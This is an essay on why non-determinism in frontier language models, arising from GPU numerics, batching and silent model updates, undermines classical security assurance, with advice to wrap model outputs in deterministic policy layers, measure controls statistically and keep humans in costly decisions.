Security engineering is, at its heart, the discipline of making promises you can keep. A firewall rule either blocks a packet or it does not. A signature either verifies or it does not. A hash either matches or it does not. The craft of the field rests on a long history of deterministic primitives that let us compose small guarantees into large ones, and then reason about the result.
Frontier large language models break that pattern in a way that many security teams are only just beginning to grapple with. When the same prompt, the same system message, the same tools, and the same retrieval context yield a different answer on Tuesday than they did on Monday, a lot of the classical machinery of assurance quietly stops working. This is not a bug that the next model version will fix. It is a structural property of the technology, and it deserves to be treated as one.
Where the non-determinism actually comes from
It is tempting to blame temperature. If you set temperature to zero, the argument goes, everything should be reproducible. In practice, this is only approximately true, and the gap between "approximately" and "exactly" is where security engineers live.
Even at temperature zero, modern inference stacks exhibit variation because of several compounding effects. Floating point addition is not associative, and GPU kernels schedule reduction operations differently based on batch composition, tensor parallel configuration, and hardware generation. Speculative decoding, continuous batching, and mixture-of-experts routing all introduce path dependencies that depend on what else is in flight on the same accelerator. Provider-side sampling parameters, system prompt revisions, and safety classifier updates can change behavior without changing a version string. And the model weights themselves are periodically refreshed under the same public identifier.
The net result is that a frontier model, accessed through a hosted API, is a stochastic process whose distribution shifts on a cadence that the caller does not control and often cannot observe.
Why this matters for security claims
Consider the shape of a typical security control. "Our policy engine denies requests to exfiltrate customer PII." To certify that control, you need to be able to say that the engine's decision is a function of the inputs, and that the function is stable across time. Audit, incident response, and regression testing all depend on this property.
When the policy engine is an LLM, you lose it. The same input may be classified as "exfiltration" today and "legitimate data access" tomorrow, not because anyone changed the prompt, but because the underlying distribution shifted. The control is still useful in an aggregate sense, but it no longer supports the kind of per-request reasoning that a security program relies on.
This has downstream consequences that are easy to underestimate. Red team exercises become harder to trust, because a finding that reproduced yesterday may quietly vanish today. Regression suites accumulate flakes until engineers start ignoring them. Post-incident analysis cannot replay the exact decision path that led to a breach. And compliance frameworks that ask "can you demonstrate that this control works" receive answers that are statistical rather than causal.
The temptation of the deterministic wrapper
A common response is to wrap the model in a deterministic shell. Cache every output, pin model versions, freeze seeds, reject any novel input that does not match a canonical form. These are reasonable mitigations, and they reduce the blast radius of non-determinism for narrow use cases.
They do not eliminate it. Caching only helps for inputs you have seen before, and adversaries specialize in producing inputs you have not. Version pinning is only as strong as the provider's honoring of it, and most hosted frontier APIs reserve the right to silently update. Seed-based determinism is not supported end-to-end on most production inference stacks, and even where it is, it does not survive changes in batch composition.
More fundamentally, the deterministic wrapper pattern inverts the economic argument for using a frontier model in the first place. The value of the model is its ability to generalize to novel inputs. If you have to restrict it to a small set of pre-validated inputs to get determinism, you have built an expensive lookup table.
What a realistic security contract looks like
The right response is to stop trying to force LLMs into a classical deterministic assurance model, and to build controls that are honest about the statistical nature of what sits underneath.
A few patterns have emerged that take this seriously. The first is to draw a sharp line between the model's output and the system's action. The model can propose, recommend, summarize, or draft, but a deterministic policy layer decides what actually happens. If the model suggests running a shell command, a deterministic allow-list decides whether it runs. If the model suggests approving a pull request, a deterministic rule decides whether the approval counts. The statistical component stays inside a well-defined envelope.
The second is to measure rather than assert. Instead of claiming that a model-based control "blocks exfiltration", instrument it to record how often it catches known-bad inputs, how often it raises false positives on known-good inputs, and how those rates drift over weeks and months. Treat the measurements as the primary artifact, and the control claim as a statistical summary of the measurements.
The third is to keep a human or a deterministic system in the loop for any decision whose reversal is expensive. Non-determinism is tolerable when the worst outcome is a retry. It is not tolerable when the worst outcome is a wire transfer, a production deployment, or a disclosure.
The structural nature of the limit
It is worth being blunt about why this is not going away. Non-determinism in frontier LLMs is not a consequence of immature engineering that better tooling will fix. It is a consequence of the optimization targets the field is pursuing: higher throughput, lower latency, more heterogeneous hardware, larger context windows, more aggressive batching. Every one of those pressures pushes toward more schedule-dependent numerical behavior, not less.
The providers could in principle offer a strict deterministic mode, at a significant cost in throughput and latency. A few have experimented with this. The uptake has been limited, because the customers who most need determinism are generally willing to accept something weaker in exchange for capability, and the customers who most need capability are unwilling to pay the determinism tax.
This means that for the foreseeable future, any security architecture that depends on frontier model calls being reproducible at the single-request level is building on sand. The architectures that will age well are the ones that treat model calls the way we treat network calls: unreliable, observable, and wrapped in deterministic logic that decides what to do with the result.
Implications for buyers and builders
If you are buying a product that uses a frontier model as a security control, ask the vendor to characterize the control statistically. What are the false positive and false negative rates on a held-out evaluation set? How do those rates drift when the underlying model is updated? What happens to the control's behavior on inputs that were not in the evaluation set?
If you are building such a product, invest in evaluation infrastructure before you invest in prompt engineering. The evaluation set is the artifact that will let you detect drift, defend decisions under audit, and prove to yourself that your control is doing what you think it is doing. A prompt without an evaluation set is a guess dressed up in confidence.
Non-determinism is not the end of using frontier models in security. It is the beginning of using them honestly. The sooner the field accepts that the underlying primitive is probabilistic, the sooner it can build the deterministic scaffolding that makes probabilistic primitives safe to deploy.